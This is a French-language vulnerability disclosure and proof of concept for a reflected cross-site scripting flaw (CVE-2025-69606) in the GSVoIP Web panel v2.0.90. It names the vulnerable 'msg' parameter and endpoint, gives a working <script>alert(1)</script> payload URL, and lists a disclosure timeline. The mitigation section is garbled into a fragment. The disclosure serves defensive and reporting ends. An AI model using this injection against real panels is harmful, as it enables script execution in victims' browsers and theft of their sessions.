
Preuve de concept pour une vulnérabilité XSS réfléchie (CVE-2025-69606) dans le panneau Web GSVoIP v2.0.90, démontrant l'exécution de JavaScript arbitraire non authentifiée via le paramètre msg.
Gravité : Moyenne | CWE : CWE-79 | Authentification requise : Non | Vecteur : À distance
Une vulnérabilité de Cross-Site Scripting (XSS) reflété a été identifiée dans le panneau Web GSVoIP (v2.0.90). Le paramètre msg du point de terminaison d'erreur ne nettoie pas les entrées contrôlées par l'utilisateur avant de les refléter dans la réponse HTML, permettant l'exécution arbitraire de JavaScript dans le navigateur de la victime.
| Champ | Détails |
|---|
| Produit | Panneau Web GSVoIP |
| Version | 2.0.90 (probablement versions antérieures) |
| Fournisseur | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| Vecteur d'attaque | Réseau |
| Authentification | Non requise |
GET /painel/gateways.php/error?msg=<payload>
Le paramètre msg est reflété directement dans la réponse HTML sans nettoyage ni encodage de sortie.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Décodée :
<script>alert(1)</script>
Lorsque l'URL forgée est consultée, la charge utile injectée s'exécute dans le navigateur de la victime :
alert(1)
msg.script-src restrictives.| Étape | Événement |
|---|---|
| 1 | Vulnérabilité découverte et signalée par Luiz Eduardo |
| 2 | CVE assigné : CVE-2025-69606 |
| 3 | Divulgation publique |
Découverte et signalée par Luiz Eduardo
CVE-2025-69606 · CWE-79 · Panneau Web GSVoIP v2.0.90